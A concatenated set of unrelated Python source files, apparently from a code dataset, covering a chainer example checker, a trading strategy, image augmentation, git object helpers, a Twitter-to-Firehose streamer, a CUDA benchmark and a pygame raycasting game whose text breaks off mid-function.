_check_example(dataset[i], n_point, no_visible)
def _check_example(example, n_point=None, no_visible=False):
assert len(example) >= 2, \
'Each example must have at least two elements:' \
'img, point (visible is optional).'
if len(example) == 2 or no_visible:
img, point = example[:2]
visible = None
elif len(example) >= 3:
img, point, visible = example[:3]
assert_is_image(img, color=True)
assert_is_point(point, visible, img.shape[1:], n_point)
|
470819
|
import pandas as pd
from odin.strategy.indicators import MovingAverage as MA
from odin.utilities.mixins.strategy_mixins import (
LongStrategyMixin,
EqualBuyProportionMixin,
TotalSellProportionMixin,
DefaultPriorityMixin,
NeverSellIndicatorMixin
)
class MovingAverageCrossoverStrategy(
LongStrategyMixin,
EqualBuyProportionMixin,
TotalSellProportionMixin,
DefaultPriorityMixin,
NeverSellIndicatorMixin
):
def buy_indicator(self, feats):
"""Implementation of abstract base class method."""
return (
feats.name == "AAPL" and
feats["short_mavg"] > feats["long_mavg"]
)
def exit_indicator(self, feats):
"""Implementation of abstract base class method."""
return (
feats["long_mavg"] > feats["short_mavg"]
)
def generate_features(self):
"""Implementation of abstract base class method."""
series = self.portfolio.data_handler.bars["adj_price_close"]
feats = pd.DataFrame(index=series.columns)
feats["long_mavg"] = MA(200).simple_moving_average(series)
feats["short_mavg"] = MA(50).simple_moving_average(series)
return feats
|
470844
|
import matplotlib.pyplot as plt
import mxnet as mx
if __name__ == '__main__':
image = 'ILSVRC2012_val_00000008.JPEG'
image_name = image.split(".")[0]
image_string = open('../image/{}'.format(image), 'rb').read()
data = mx.image.imdecode(image_string, flag=1)
plt.imshow(data.asnumpy())
plt.savefig('{}_original.png'.format(image_name))
cast = mx.image.CastAug()
data = cast(data)
brightness = mx.image.BrightnessJitterAug(brightness=0.3)
brightness_data = brightness(data)
brightness_data = mx.nd.Cast(brightness_data, dtype='uint8')
plt.imshow(brightness_data.asnumpy())
plt.savefig('{}_brightness.png'.format(image_name))
|
470845
|
from git_remote_dropbox.constants import DEVNULL
import subprocess
import zlib
EMPTY_TREE_HASH = '4b825dc642cb6eb9a060e54bf8d69288fbee4904'
def command_output(*args, **kwargs):
"""
Return the result of running a git command.
"""
args = ('git',) + args
output = subprocess.check_output(args, stderr=DEVNULL)
if kwargs.get('decode', True):
output = output.decode('utf8')
if kwargs.get('strip', True):
output = output.strip()
return output
def command_ok(*args):
"""
Return whether a git command runs successfully.
"""
args = ('git',) + args
return subprocess.call(args, stdout=DEVNULL, stderr=DEVNULL) == 0
def is_ancestor(ancestor, ref):
"""
Return whether ancestor is an ancestor of ref.
This returns true when it is possible to fast-forward from ancestor to ref.
"""
return command_ok('merge-base', '--is-ancestor', ancestor, ref)
def object_exists(sha):
"""
Return whether the object exists in the repository.
"""
return command_ok('cat-file', '-e', sha)
def history_exists(sha):
"""
Return whether the object, along with its history, exists in the
repository.
"""
return command_ok('rev-list', '--objects', sha)
def ref_value(ref):
"""
Return the hash of the ref.
"""
return command_output('rev-parse', ref)
def symbolic_ref_value(name):
"""
Return the branch head to which the symbolic ref refers.
"""
return command_output('symbolic-ref', name)
def object_kind(sha):
"""
Return the type of the object.
"""
return command_output('cat-file', '-t', sha)
def object_data(sha, kind=None):
"""
Return the contents of the object.
If kind is None, return a pretty-printed representation of the object.
"""
if kind is not None:
return command_output('cat-file', kind, sha, decode=False, strip=False)
else:
return command_output('cat-file', '-p', sha, decode=False, strip=False)
def encode_object(sha):
"""
Return the encoded contents of the object.
The encoding is identical to the encoding git uses for loose objects.
This operation is the inverse of `decode_object`.
"""
kind = object_kind(sha)
size = command_output('cat-file', '-s', sha)
contents = object_data(sha, kind)
data = kind.encode('utf8') + b' ' + size.encode('utf8') + b'\0' + contents
compressed = zlib.compress(data)
return compressed
def decode_object(data):
"""
Decode the object, write it, and return the computed hash.
This operation is the inverse of `encode_object`.
"""
decompressed = zlib.decompress(data)
header, contents = decompressed.split(b'\0', 1)
kind = header.split()[0]
return write_object(kind.decode('utf8'), contents)
def write_object(kind, contents):
p = subprocess.Popen(['git', 'hash-object', '-w', '--stdin', '-t', kind],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=DEVNULL)
sha = p.communicate(contents)[0].decode('utf8').strip()
return sha
def list_objects(ref, exclude):
"""
Return the objects reachable from ref excluding the objects reachable from
exclude.
"""
exclude = ['^%s' % obj for obj in exclude if object_exists(obj)]
objects = command_output('rev-list', '--objects', ref, *exclude)
if not objects:
return []
return [i.split()[0] for i in objects.split('\n')]
def referenced_objects(sha):
"""
Return the objects directly referenced by the object.
"""
kind = object_kind(sha)
if kind == 'blob':
# blob objects do not reference any other objects
return []
data = object_data(sha).decode('utf8').strip()
if kind == 'tag':
# tag objects reference a single object
obj = data.split('\n')[0].split()[1]
return [obj]
elif kind == 'commit':
# commit objects reference a tree and zero or more parents
lines = data.split('\n')
tree = lines[0].split()[1]
objs = [tree]
for line in lines[1:]:
if line.startswith('parent '):
objs.append(line.split()[1])
else:
break
return objs
elif kind == 'tree':
# tree objects reference zero or more trees and blobs, or submodules
if not data:
# empty tree
return []
lines = data.split('\n')
# submodules have the mode '160000' and the kind 'commit', we filter them out because
# there is nothing to download and this causes errors
return [line.split()[2] for line in lines if not line.startswith('160000 commit ')]
else:
raise Exception('unexpected git object type: %s' % kind)
def get_remote_url(name):
"""
Return the URL of the given remote.
"""
return command_output('remote', 'get-url', name)
|
470867
|
import json
import boto3
import requests
from textblob import TextBlob
from ConfigParser import SafeConfigParser
from twitter import Twitter, OAuth, TwitterHTTPError, TwitterStream
# Read the Config File to get the twitter keys and tokens
config = SafeConfigParser()
config.read('twitter-rekognition.config')
# Create an S3 client
s3 = boto3.client('s3')
bucket = config.get('s3', 'twitter_bucket')
# Firehose delivery stream to stream tweets
fh = boto3.client('firehose')
deliverystream_name = config.get('firehose', 'deliverystream_name')
# Twitter Configuration keys
consumer_secret = config.get('keys', 'consumer_secret')
consumer_key = config.get('keys', 'consumer_key')
access_token = config.get('keys', 'access_token')
access_token_secret = config.get('keys', 'access_token_secret')
# Twitter user
user = "awsgrant"
if __name__ == '__main__':
try:
oauth = OAuth(access_token, access_token_secret, consumer_key, consumer_secret)
# Connect to Twitter Streaming API
#twitter_stream = TwitterStream(auth = oauth)
# UNCOMMENT when ready to test
twitter_stream = TwitterStream(auth = oauth, secure = True)
# Get an iterator on the public data following through Twitter
#tweet_iterator = twitter_stream.statuses.filter(locations='-180,-90,180,90')
#print(json.loads(twitter_stream))
# UNCOMMENT when ready to test
tweets = twitter_stream.statuses.filter(track=user)
for tweet in tweets:
#print json.dumps(tweet, indent=2, sort_keys=True)
#entities = tweet.get("entities")
entities = tweet.get("extended_entities")
print json.dumps(entities, indent=2, sort_keys=True)
if (entities):
print json.dumps(entities, indent=2, sort_keys=True)
media_list = entities.get("media")
if (media_list):
for media in media_list:
if (media.get("type", None) == "photo"):
#print json.dumps(media, indent=2, sort_keys=True)
twitter_data = {}
description = tweet.get("user").get("description")
loc = tweet.get("user").get("location")
text = tweet.get("text")
coords = tweet.get("coordinates")
geo = tweet.get("geo")
name = tweet.get("user").get("screen_name")
user_created = tweet.get("user").get("created_at")
followers = tweet.get("user").get("followers_count")
id_str = tweet.get("id_str")
created = tweet.get("created_at")
retweets = tweet.get("retweet_count")
bg_color = tweet.get("user").get("profile_background_color")
blob = TextBlob(text)
sent = blob.sentiment
image_url = media.get("media_url")
twitter_data['description'] = description
twitter_data['loc'] = loc
twitter_data['text'] = text
twitter_data['coords'] = coords
twitter_data['geo'] = geo
twitter_data['name'] = name
twitter_data['user_created'] = user_created
twitter_data['followers'] = followers
twitter_data['id_str'] = id_str
twitter_data['created'] = created
twitter_data['retweets'] = retweets
twitter_data['bg_color'] = bg_color
twitter_data['sent'] = sent
twitter_data['image_url'] = image_url
# Stream the content via Kinesis Firehose Deliver to S3
print("Sending to Kinesis")
response = fh.put_record(
DeliveryStreamName=deliverystream_name,
Record = {'Data': json.dumps(twitter_data, indent = 4)}
)
except Exception as e:
print (e)
|
470902
|
from matplotlib.ticker import FormatStrFormatter
from phi.backend.base import load_tensorflow
from phi.solver.cuda.cuda import CudaPressureSolver
from phi.solver.sparse import SparseCGPressureSolver
import matplotlib.pyplot as plt
from phi.solver.cuda.benchmarks.benchmark_utils import *
cudaSolver = CudaPressureSolver()
sparseCGSolver = SparseCGPressureSolver()
# configuration of the benchmark
warmup = 5
testruns = 25
dimension = 3
accuracy = 1e-5
batch_size = 1
cpuTests = []#[8, 16, 32, 64, 128]
tfTests = []#[8, 16, 32, 64, 128]
cudaTests = [8, 16, 32, 64, 128]#, 256]
# benchmark
load_tensorflow()
cudaTimes = benchmark_pressure_solve(cudaSolver, cudaTests, dimension, tf.float32, warmup, testruns, accuracy, batch_size)
tfTimes = benchmark_pressure_solve(sparseCGSolver, tfTests, dimension, tf.float64, warmup, testruns, accuracy, batch_size)
cpuTimes = benchmark_pressure_solve(sparseCGSolver, cpuTests, dimension, tf.float64, warmup, testruns, accuracy, batch_size, cpu=True)
cudaAVG = [np.mean(a) for a in cudaTimes]
cudaSTD = [np.std(a) for a in cudaTimes]
tfAVG = [np.mean(a) for a in tfTimes]
tfSTD = [np.std(a) for a in tfTimes]
cpuAVG = [np.mean(a) for a in cpuTimes]
cpuSTD = [np.std(a) for a in cpuTimes]
# serialize and print all data necessary for the graph
print("cudaTests = " + str(cudaTests))
print("cudaAVG = " + str(cudaAVG))
print("cudaSTD = " + str(cudaSTD))
print("tfTests = " + str(tfTests))
print("tfAVG = " + str(tfAVG))
print("tfSTD = " + str(tfSTD))
print("cpuTests = " + str(cpuTests))
print("cpuAVG = " + str(cpuAVG))
print("cpuSTD = " + str(cpuSTD))
plt.errorbar(tfTests, tfAVG, tfSTD, fmt='-o')
plt.errorbar(cpuTests, cpuAVG, cpuSTD, fmt='-o')
plt.errorbar(cudaTests, cudaAVG, cudaSTD, fmt='-o')
plt.legend(['Tensorflow GPU', 'Tensorflow CPU', 'CUDA'], loc='upper left')
plt.xscale('log', basex=2)
plt.yscale('log')
plt.xticks(cudaTests)
ax = plt.gca()
ax.xaxis.set_major_formatter(FormatStrFormatter('%.0f'))
plt.xlabel("Grid Dimension 3D")
plt.ylabel("Computation Time in seconds")
plt.show()
|
470903
|
import pygame as pg
import numpy as np
from numba import njit
def main():
pg.init()
pg.display.set_caption("Dead and - A Python game by FinFET, thanks for playing!")
font = pg.font.SysFont("Courier New", 70)
sounds = load_sounds()
m_vol, sfx_vol, music = 0.4, 0.5, 0
set_volume(m_vol, sfx_vol, sounds)
sounds['music'+str(music)].play(-1)
stepdelay = pg.time.get_ticks()/200
stepdelay2 = stepdelay
click, clickdelay = 0, stepdelay
screen = pg.display.set_mode((800,600))
running, pause, options, newgame = 1, 1, 0, 2
clock = pg.time.Clock()
pg.mouse.set_visible(False)
timer = 0
hres, halfvres, mod, frame = adjust_resolution()
fullscreen = 0
level, player_health, swordsp, story = 0, 0, 0, 0
#sky1, floor, wall, door, window, enemies
level_textures = [[0, 1, 0, 0, 1, 4], #level 0
[0, 2, 1, 1, 0, 3], #level 1
[1, 0, 2, 1, 1, 4], #level 2
[1, 3, 1, 0, 0, 1], #level 3
[2, 1, 2, 1, 1, 0], #level 4
[2, 0, 0, 0, 0, 2]] #level 5
menu = [pg.image.load('Assets/Textures/menu0.png').convert_alpha()]
menu.append(pg.image.load('Assets/Textures/options.png').convert_alpha())
menu.append(pg.image.load('Assets/Textures/credits.png').convert_alpha())
menu.append(pg.image.load('Assets/Textures/menu1.png').convert_alpha())
hearts = pg.image.load('Assets/Textures/hearts.png').convert_alpha()
colonel = pg.image.load('Assets/Sprites/colonel1.png').convert_alpha()
hearts2 = pg.Surface.subsurface(hearts,(0,0,player_health*10,20))
exit1 = pg.image.load('Assets/Textures/exit.png').convert_alpha()
exit2 = 1
exits = [pg.Surface.subsurface(exit1,(0,0,50,50)), pg.Surface.subsurface(exit1,(50,0,50,50))]
splash = []
for i in range(4):
splash.append(pg.image.load('Assets/Textures/splash'+str(i)+'.jpg').convert())
blood = pg.image.load('Assets/Textures/blood0.png').convert_alpha()
blood_size = np.asarray(blood.get_size())
sky1 = hearts.copy() # initialize with something to adjust resol on start
msg = "Press any key..."
surf = splash[0].copy()
splash_screen(msg, splash[0], clock, font, screen)
msg = " "
while running:
pg.display.update()
ticks = pg.time.get_ticks()/200
er = min(clock.tick()/500, 0.3)
if not pause and (player_health <= 0 or (exit2 == 0 and int(posx) == exitx and int(posy) == exity)):
msg = ' '
if player_health <= 0:
sounds['died'].play()
newgame = 2
surf = splash[3].copy()
else:
level += 1
player_health = min(player_health+2, 20)
sounds['won'].play()
newgame = 1
if level > 5:
level, newgame = 0, 2
sounds['died'].play()
surf = splash[2].copy()
surf.blit(font.render('Total time: ' + str(round(timer,1)), 1, (255, 255, 255)), (20, 525))
else:
msg = "Cleared level " + str(level-1)+'!'
splash_screen(msg, surf, clock, font, screen)
pause, clickdelay = 1, ticks
pg.time.wait(500)
if pg.mouse.get_pressed()[0]:
if swordsp < 1 and not pause:
swordsp, damage_mod = 1, 1
if pause and ticks - clickdelay > 1:
click, clickdelay = 1, ticks
sounds['healthup'].play()
for event in pg.event.get():
if event.type == pg.QUIT:
running = False
if event.type == pg.KEYDOWN:
if event.key == ord('p') or event.key == pg.K_ESCAPE:
if not pause:
pause = 1
else:
if options > 0:
options = 0
elif newgame == 0:
pause = 0
pg.mouse.set_pos(400,300)
if event.key == ord('f'): # toggle fullscreen
pg.display.toggle_fullscreen()
fullscreen = not(fullscreen)
if pause:
clock.tick(60)
surf2, pause, options, running, newgame, adjust_res, m_vol, sfx_vol, story = pause_menu(
surf.copy(), menu, pause, options, click, running, m_vol, sfx_vol, sounds, newgame, font, msg, level, ticks, hres, story)
if adjust_res != 1:
hres, halfvres, mod, frame = adjust_resolution(int(hres*adjust_res))
sky = pg.surfarray.array3d(pg.transform.smoothscale(sky1, (720, halfvres*4)))
adjust_res = 1
screen.blit(surf2, (0,0))
click = 0
if newgame == 1:
newgame, pause = 0, not(pause)
if player_health <= 0 or msg[0] != 'C':
surf = splash[1].copy()
splash_screen(' ', surf, clock, font, screen)
level, player_health, timer = 0, 20, -0.1
if np.random.randint(0, 2) != music:
sounds['music'+str(music)].fadeout(1000)
music = int(not(music))
sounds['music'+str(music)].play(-1)
msg = 'Loading...'
surf2 = surf.copy()
surf2.blit(font.render(msg, 1, (255, 255, 255)), (30, 500))
surf2.blit(font.render(msg, 1, (30, 255, 155)), (32, 502))
screen.blit(surf2, (0,0))
pg.display.update()
msg = 'Kill the monsters!'
if story:
posx, posy, rot, rotv, maph, mapc, exitx, exity, stepscount, size = load_map(level)
nlevel = level_textures[level]
else:
size = np.random.randint(10+level*2, 16+level*2)
nenemies = size #number of enemies
posx, posy, rot, rotv, maph, mapc, exitx, exity, stepscount = gen_map(size)
nlevel = [np.random.randint(0,3), #sky1
np.random.randint(0,4), #floorwall
np.random.randint(0,3), #wall
np.random.randint(0,2), #door
np.random.randint(0,2), #window
np.random.randint(0,5), #enemies
]
nenemies = level**2 + 10 + level #number of enemies
sprites, spsize, sword, swordsp = get_sprites(nlevel[5])
sky1, floor, wall, bwall, door, window = load_textures(nlevel)
sky = pg.surfarray.array3d(pg.transform.smoothscale(sky1, (720, halfvres*4)))
enemies = spawn_enemies(nenemies, maph, size, posx, posy, level/2)
hearts2 = pg.Surface.subsurface(hearts,(0,0,player_health*10,20))
exit2, damage_mod, blood_scale = 1, 1, 1
mape, minimap = np.zeros((size, size)), np.zeros((size, size, 3))
sounds['healthup'].play()
else:
timer = timer + er/2
frame = new_frame(posx-0.2*np.cos(rot), posy-0.2*np.sin(rot), rot, frame, sky, floor, hres, halfvres,
mod, maph, size, wall, mapc, exitx, exity, nenemies, rotv, door, window, bwall, exit2)
surf = pg.surfarray.make_surface(frame)
mape = np.zeros((size, size))
health = player_health
enemies, player_health, mape = enemies_ai(posx, posy, enemies, maph, size, mape, swordsp, ticks, player_health, nenemies, level/3)
enemies = sort_sprites(posx-0.2*np.cos(rot), posy-0.2*np.sin(rot), rot, enemies, maph, size, er/3)
if exit2 == 0:
surf = draw_colonel(surf, colonel, posx-0.2*np.cos(rot), posy-0.2*np.sin(rot), exitx+0.5, exity+0.5,
hres, halfvres, rot, rotv, maph, size)
surf, en = draw_sprites(surf, sprites, enemies, spsize, hres, halfvres, ticks, sword, swordsp, rotv)
if int(swordsp) > 0 and damage_mod < 1:
blood_scale = blood_scale*(1 + 2*er)
scaled_blood = pg.transform.scale(blood, 4*blood_scale*blood_size*hres/800)
surf.blit(scaled_blood, np.asarray([hres/2, halfvres]) - 2*blood_scale*blood_size*hres/800)
surf = pg.transform.scale2x(surf)
surf = pg.transform.smoothscale(surf, (800, 600))
surf.blit(hearts2, (20,20))
if exit2 == 0:
minimap[int(posx)][int(posy)] = (50, 50, 255)
surfmap = pg.surfarray.make_surface(minimap.astype('uint8'))
surfmap = pg.transform.scale(surfmap, (size*5, size*5))
surf.blit(surfmap,(20, 50), special_flags=pg.BLEND_ADD)
minimap[int(posx)][int(posy)] = (100, 100, 0)
surf.blit(font.render(str(round(timer,1)), 1, (255, 255, 255)), (20, 525))
surf.blit(exits[exit2], (730,20))
screen.blit(surf, (0,0))
if health > player_health:
hearts2 = pg.Surface.subsurface(hearts,(0,0,player_health*10,20))
sounds['hurt'].play()
if ticks - stepdelay > 2 and stepscount != posx + posy:
sounds['step'].play()
stepdelay = ticks
stepscount = posx + posy
if mape[int(posx)][int(posy)] > 0:
delaycontrol = max(0.3, 2/np.random.uniform(0.99, mape[int(posx)][int(posy)]))
if ticks - stepdelay2 > delaycontrol:
sounds['step2'].play()
stepdelay2 = ticks
if int(swordsp) > 0:
if swordsp == 1:
damage_mod = 1
while enemies[en][3] < 10 and damage_mod > 0.4 and en >= 0:
x = posx -0.2*np.cos(rot) + np.cos(rot + np.random.uniform(0, 0.05))/enemies[en][3]
y = posy -0.2*np.sin(rot) + np.sin(rot + np.random.uniform(0, 0.05))/enemies[en][3]
z = 0.5 + np.sin(rotv*-0.392699)/enemies[en][3]
dist2en = np.sqrt((enemies[en][0]-x)**2 + (enemies[en][1]-y)**2)
if dist2en < 0.1 and z > 0 and z < 0.07*enemies[en][5]:
if z > 0.05*enemies[en][5]:
enemies[en][8] = enemies[en][8] - np.random.uniform(0,2)*2
else:
enemies[en][8] = enemies[en][8] - np.random.uniform(0,2)
enemies[en][10] = ticks
x = enemies[en][0] + 0.1*np.cos(rot)
y = enemies[en][1] + 0.1*np.sin(rot)
if maph[int(x)][int(y)] == 0:
enemies[en][0]= (x + enemies[en][0])/2 # push back
enemies[en][1]= (y + enemies[en][1])/2
if damage_mod == 1:
blood_scale = enemies[en][3]
sounds['swoosh'].play()
if enemies[en][4]:
sounds['hitmonster2'].set_volume(min(1, enemies[en][3])*sfx_vol)
sounds['hitmonster2'].play()
else:
sounds['hitmonster'].set_volume(min(1, enemies[en][3])*sfx_vol)
sounds['hitmonster'].play()
damage_mod = damage_mod*0.5
if enemies[en][8] < 0:
sounds['deadmonster'].set_volume(min(1, enemies[en][3])*sfx_vol)
sounds['deadmonster'].play()
nenemies = nenemies - 1
if nenemies == 0:
exit2, msg = 0, "Find the master!"
## if np.random.uniform(0,1) < 0.3:
## player_health = min(player_health+0.5, 20)
## hearts2 = pg.Surface.subsurface(hearts,(0,0,player_health*10,20))
## sounds['healthup'].play()
en = en - 1
if damage_mod == 1:
sounds['swoosh2'].play()
swordsp = (swordsp + er*10)%4
fps = int(clock.get_fps())
pg.display.set_caption("Health: "+str(round(player_health, 1))+" Enemies: " + str(nenemies) + " FPS: " + str(fps)+ ' ' + msg)
posx, posy, rot, rotv = movement(pg.key.get_pressed(), posx, posy, rot, maph, er, rotv)
pg.mouse.set_pos(400,300)
def movement(pressed_keys, posx, posy, rot, maph, et, rotv):
x, y, diag = posx, posy, 0
if pg.mouse.get_focused():
p_mouse = pg.mouse.get_pos()
rot = rot + np.clip((p_mouse[0]-400)/200, -0.2, .2)
rotv = rotv + np.clip((p_mouse[1]-300)/200, -0.2, .2)
rotv = np.clip(rotv, -0.999, .999)
if pressed_keys[pg.K_UP] or pressed_keys[ord('w')]:
x, y, diag = x + et*np.cos(rot), y + et*np.sin(rot), 1
elif pressed_keys[pg.K_DOWN] or pressed_keys[ord('s')]:
x, y, diag = x - et*np.cos(rot), y - et*np.sin(rot), 1
if pressed_keys[pg.K_LEFT] or pressed_keys[ord('a')]:
et = et/(diag+1)
x, y = x + et*np.sin(rot), y - et*np.cos(rot)
elif pressed_keys[pg.K_RIGHT] or pressed_keys[ord('d')]:
et = et/(diag+1)
x, y = x - et*np.sin(rot), y + et*np.cos(rot)
posx, posy = check_walls(posx, posy, maph, x, y)
return posx, posy, rot, rotv
def gen_map(size):
mapc = np.random.uniform(0,1, (size,size,3))
maph = np.random.choice([0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3, 4], (size,size))
maph[0,:] = np.random.choice([1, 2, 3, 4], size)
maph[size-1,:] = np.random.choice([1, 2, 3, 4], size)
maph[:,0] = np.random.choice([1, 2, 3, 4], size)
maph[:,size-1] = np.random.choice([1, 2, 3, 4], size)
posx, posy = np.random.randint(1, size -2)+0.5, np.random.randint(1, size -2)+0.5
rot, rotv, stepscount = np.pi/4, 0, posx + posy
x, y = int(posx), int(posy)
maph[x][y] = 0
count = 0
while True:
testx, testy = (x, y)
if np.random.uniform() > 0.5:
testx = testx + np.random.choice([-1, 1])
else:
testy = testy + np.random.choice([-1, 1])
if testx > 0 and testx < size -1 and testy > 0 and testy < size -1:
if maph[testx][testy] == 0 or count > 5:
count = 0
x, y = (testx, testy)
maph[x][y] = 0
dtx = np.sqrt((x-posx)**2 + (y-posy)**2)
if (dtx > size*.6 and np.random.uniform() > .999) or np.random.uniform() > .99999:
exitx, exity = (x, y)
break
else:
count = count+1
return posx, posy, rot, rotv, maph, mapc, exitx, exity, stepscount
def load_map(level):
mapc = pg.surfarray.array3d(pg.image.load('Assets/Levels/map'+str(level)+'.png'))
size = len(mapc)
maph = np.random.choice([1, 2, 3, 4], (size,size))
colors = np.asarray([[0,0,0], [255,255,255], [127,127,127]])
posx, exitx = None, None
for i in range(size):
for j in range(size):
color = mapc[i][j]
if (color == colors[0]).all() or (color == colors[1]).all() or (color == colors[2]).all():
maph[i][j] = 0
if (color == colors[1]).all():
posx, posy = i+0.5, j+0.5
if (color == colors[2]).all():
exitx, exity = i, j
while posx == None: # if no start is found
x, y = np.random.randint(1, size), np.random.randint(1, size)
if (mapc[x][y] == colors[0]).all():
posx, posy = x+0.5, y+0.5
while exitx == None: # if no exit is found
x, y = np.random.randint(1, size), np.random.randint(1, size)
if (mapc[x][y] == colors[0]).all():
exitx, exity = x, y
rot, rotv, stepscount = np.pi/4, 0, posx + posy
return posx, posy, rot, rotv, maph, mapc/255, exitx, exity, stepscount, size
@njit(cache=True)
def new_frame(posx, posy, rot, frame, sky, floor, hres, halfvres, mod, maph, size, wall, mapc,
exitx, exity, nenemies, rotv, door, window, bwall, exit2):
offset = -int(halfvres*rotv)
for i in range(hres):
rot_i = rot + np.deg2rad(i/mod - 30)
sin, cos, cos2 = np.sin(rot_i), np.cos(rot_i), np.cos(np.deg2rad(i/mod - 30))
frame[i][:] = sky[int(np.rad2deg(rot_i)*2%720)][halfvres-offset:3*halfvres-offset]
n = 0
n2 = 0
x, y = posx +0.2*cos, posy +0.2*sin
for j in range(2000):
x, y = x +0.01*cos, y +0.01*sin
if n == 0 and maph[int(x)%(size-1)][int(y)%(size-1)] != 0: # found lower wall
n = np.sqrt((x-posx)**2+(y-posy)**2)
if maph[int(x)%(size-1)][int(y)%(size-1)] == 2:# found upper wall
n2 = np.sqrt((x-posx)**2+(y-posy)**2)
h = halfvres/(n2*cos2 + 0.001)
break
cwall = wall
if n2 > 0.5 and 3*h > int(halfvres/(n*cos2 + 0.000001)): #draw upper wall
xx = int(x*3%1*99)
xxx = x%1
if x%1 < 0.01 or x%1 > 0.99:
xx = int(y*3%1*99)
xxx = y%1
yy = np.linspace(0, 3, int(h*2))*99%99
shade = 0.3 + 0.7*(h/halfvres)
if shade > 1:
shade = 1
if maph[int(x-0.02)%(size-1)][int(y-0.02)%(size-1)] != 0:
shade = shade*0.8
c = shade*mapc[int(x)%(size-1)][int(y)%(size-1)]
if n2 > 3.5:
cwall = bwall
for k in range(int(h)*2):
c2 = c*cwall[xx][int(yy[k])]
h1 = int(halfvres - int(h) +k +offset -2*h +3)
h2 = int(halfvres+3*h-k+offset-1 +2*h - 6)
if xxx > 1/3 and xxx < 2/3 and k > h*2/3 and k < h*4/3:
c2 = shade*window[xx][int(yy[k])]
if h1 >= 0 and h1 < 2*halfvres:
frame[i][h1] = c2
if h2 < halfvres*2:
frame[i][h2] = c2
if n == 0:
n = 1000
x, y = posx +n*cos, posy +n*sin
walltype = maph[int(x)%(size-1)][int(y)%(size-1)]
cwall = wall
if n > 3.5:
cwall = bwall
h = int(halfvres/(n*cos2 + 0.000001))
xx = int(x*3%1*99)
xxx = x%1
if x%1 < 0.01 or x%1 > 0.99:
xx = int(y*3%1*99)
xxx = y%1
yy = np.linspace(0, 3, int(h*2))*99%99
shade = 0.4 + 0.6*(h/halfvres)
if shade > 1:
shade = 1
ash = 0
if maph[int(x-0.33)%(size-1)][int(y-0.33)%(size-1)] != 0:
ash = 1
if maph[int(x-0.01)%(size-1)][int(y-0.01)%(size-1)] != 0:
shade, ash = shade*0.7, 0
c = mapc[int(x)%(size-1)][int(y)%(size-1)]
cdoor = np.sqrt(np.ones(3) - c)
c = shade*c
start_range, stop_range = 0, int(2*h)
if h > halfvres+abs(offset):
start_range = int(h - halfvres - offset)
stop_range = int(h + halfvres - offset)
for k in range(start_range, stop_range):
c2 = c*cwall[xx][int(yy[k])]
h1 = int(halfvres - h +k +offset)
h2 = int(halfvres+3*h-k+offset-3)
if xxx > 1/3 and xxx < 2/3 and k > h*2/3:
if walltype < 3:
c2 = shade*cdoor*door[xx][int(yy[k])]
elif k < h*4/3 and walltype == 3:
c2 = shade*window[xx][int(yy[k])]
if h1 >= 0 and h1 < 2*halfvres:
if ash and 1-k/(2*h) < 1-xx/99:
c2, c, ash = 0.7*c2, 0.7*c, 0
frame[i][h1] = c2
if h2 < halfvres*2:
frame[i][h2] = c2
for j in range(int(halfvres -h -offset)): #floor
n = (halfvres/(halfvres-j - offset ))/cos2
x, y = posx + cos*n, posy + sin*n
xx, yy = int(x*3%1*99), int(y*3%1*99)
shade = min(0.2 + 0.8/n, 1)
if maph[int(x-0.33)%(size-1)][int(y-0.33)%(size-1)] != 0:
shade = shade*0.7
elif ((maph[int(x-0.33)%(size-1)][int(y)%(size-1)] and y%1>x%1) or
(maph[int(x)%(size-1)][int(y-0.33)%(size-1)] and x%1>y%1)):
shade = shade*0.7
frame[i][halfvres*2-j-1] = shade*(floor[xx][yy]*2+frame[i][halfvres*2-j-1])/3
if exit2 == 0 and int(x) == exitx and int(y) == exity and (x%1-0.5)**2 + (y%1-0.5)**2 < 0.2:
ee = j/(20*halfvres)
frame[i][j:2*halfvres-j] = (ee*np.ones(3)*255+frame[i][j:2*halfvres-j])/(1+ee)
return frame
@njit(cache=True)
def vision(posx, posy, enx, eny, dist2p, maph, size):
cos, sin = (posx-enx)/dist2p, (posy-eny)/dist2p
x, y = enx, eny
seen = 1
x, y = x +0.25*cos, y +0.25*sin
for i in range(abs(int((dist2p-0.5)/0.05))):
x, y = x +0.05*cos, y +0.05*sin
if (maph[int(x-0.02)%(size-1)][int(y-0.02)%(size-1)] or
maph[int(x-0.02)%(size-1)][int(y+0.02)%(size-1)] or
maph[int(x+0.02)%(size-1)][int(y-0.02)%(size-1)] or
maph[int(x+0.02)%(size-1)][int(y+0.02)%(size-1)]):
seen = 0
break
return seen
@njit(cache=True)
def enemies_ai(posx, posy, enemies, maph, size, mape, swordsp, ticks, player_health, nenemies, level=0):
if nenemies < 5: # teleport far enemies closer
for en in range(len(enemies)): # mape = enemies heatmap
if enemies[en][8] > 0:
enx, eny = enemies[en][0], enemies[en][1]
dist2p = np.sqrt((enx-posx)**2 + (eny-posy)**2 + 1e-16)
if dist2p > 10:
for i in range(10):
x, y = np.random.randint(1, size), np.random.randint(1, size)
dist2p = np.sqrt((x+0.5-posx)**2 + (y+0.5-posy)**2 + 1e-16)
if dist2p > 6 and dist2p < 8 and maph[x][y] == 0:
enemies[en][0], enemies[en][1] = x + 0.5, y + 0.5
break
for en in range(len(enemies)): # mape = enemies heatmap
if enemies[en][8] > 0:
x, y = int(enemies[en][0]), int(enemies[en][1])
mape[x-1:x+2, y-1:y+2] = mape[x-1:x+2, y-1:y+2] + 1
for en in range(len(enemies)):
if enemies[en][8] > 0 and np.random.uniform(0,1) < 0.1: # update only % of the time
enx, eny, angle = enemies[en][0], enemies[en][1], enemies[en][6]
health, state, cooldown = enemies[en][8], enemies[en][9], enemies[en][10]
dist2p = np.sqrt((enx-posx)**2 + (eny-posy)**2 + 1e-16)
friends = mape[int(enx)][int(eny)] - 1
if dist2p > 1.42: # add friends near the player if not too close
friends = friends + mape[int(posx)][int(posy)]
not_afraid = 0
# zombies are less afraid
if health > 1 + enemies[en][4] - level or health + friends > 3 + enemies[en][4] - level:
not_afraid = 1
if state == 0 and dist2p < 6: # normal
angle = angle2p(enx, eny, posx, posy)
angle2 = (enemies[en][6]-angle)%(2*np.pi)
if angle2 > 11*np.pi/6 or angle2 < np.pi/6 or (swordsp >= 1 and dist2p < 3): # in fov or heard
if vision(posx, posy, enx, eny, dist2p, maph, size):
if not_afraid and ticks - cooldown > 5:
state = 1 # turn aggressive
elif dist2p < 2:
state = 2 # retreat
angle = angle - np.pi
else:
angle = enemies[en][6] # revert to original angle
elif state == 1: # aggressive
